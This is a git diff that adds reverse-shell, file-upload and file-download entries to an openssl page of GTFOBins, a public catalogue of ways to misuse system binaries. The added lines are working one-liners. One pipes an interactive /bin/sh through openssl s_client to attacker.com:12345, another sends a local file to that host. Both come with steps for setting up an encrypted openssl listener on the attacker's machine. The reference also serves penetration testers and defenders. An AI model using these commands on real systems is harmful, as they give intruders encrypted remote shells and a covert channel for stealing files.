diff --git a/_gtfobins/openssl.md b/_gtfobins/openssl.md index 107b0f6..5c7721c 100644 --- a/_gtfobins/openssl.md +++ b/_gtfobins/openssl.md @@ -1,5 +1,25 @@ --- functions: + reverse-shell: + - description: Run `openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes && openssl s_server -quiet -key key.pem -cert cert.pem -port 12345` on the attacker box to receive the shell. Communication between attacker and target will be encrypted. + code: | + RHOST=attacker.com + RPORT=12345 + mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s + file-upload: + - description: Send a file to a TCP port, transmission will be encrypted. Run `openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes && openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 > file_to_save` on the attacker box to collect the file. + code: | + RHOST=attacker.com + RPORT=12345 + LFILE=file_to_send + openssl s_client -quiet -connect $RHOST:$RPORT < "$LFILE" + file-download: + - description: Fetch a file from a TCP port, transmission will be encrypted. Run `openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes && openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 < file_to_send` on the attacker box to send the file. + code: | + RHOST=attacker.com + RPORT=12345 + LFILE=file_to_save + openssl s_client -quiet -connect $RHOST:$RPORT > "$LFILE" file-write: - code: | LFILE=file_to_write